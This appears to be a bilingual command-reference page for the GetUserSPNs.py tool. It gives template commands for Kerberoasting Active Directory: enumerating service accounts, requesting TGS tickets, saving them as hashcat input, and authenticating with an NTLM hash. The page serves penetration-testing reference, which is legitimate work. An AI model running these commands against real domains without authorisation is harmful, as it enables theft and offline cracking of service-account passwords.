Linux command
getuserspns.py 命令
网络
复制后可按需替换文件名、目录或参数。
常用示例
Enumerate SPN accounts
GetUserSPNs.py [domain]/[username]:[password] -dc-ip [dc_ip]
Request service tickets
GetUserSPNs.py [domain]/[username]:[password] -dc-ip [dc_ip] -request
Output for hashcat
GetUserSPNs.py [domain]/[username]:[password] -dc-ip [dc_ip] -request -outputfile [hashes.txt]
Using NTLM hash
GetUserSPNs.py [domain]/[username] -hashes :[ntlm_hash] -dc-ip [dc_ip]
说明
GetUserSPNs.py performs Kerberoasting attacks against Active Directory. It identifies service accounts with SPNs and requests service tickets containing crackable password hashes. The tool queries AD for accounts with servicePrincipalName attributes, then requests TGS tickets. These tickets contain password material crackable offline. GetUserSPNs.py is used in penetration testing for credential attacks.
参数
- -dc-ip _IP_
- Domain controller IP.
- -request
- Request TGS tickets.
- -hashes _LMHASH:NTHASH_
- Use NTLM hashes.
- -outputfile _FILE_
- Output file for hashes.
- --help
- Display help information.
FAQ
What is the getuserspns.py command used for?
GetUserSPNs.py performs Kerberoasting attacks against Active Directory. It identifies service accounts with SPNs and requests service tickets containing crackable password hashes. The tool queries AD for accounts with servicePrincipalName attributes, then requests TGS tickets. These tickets contain password material crackable offline. GetUserSPNs.py is used in penetration testing for credential attacks.
How do I run a basic getuserspns.py example?
Run `GetUserSPNs.py [domain]/[username]:[password] -dc-ip [dc_ip]` in a terminal, then adjust file names, paths, flags, or remote targets for your system.
What does -dc-ip _IP_ do in getuserspns.py?
Domain controller IP.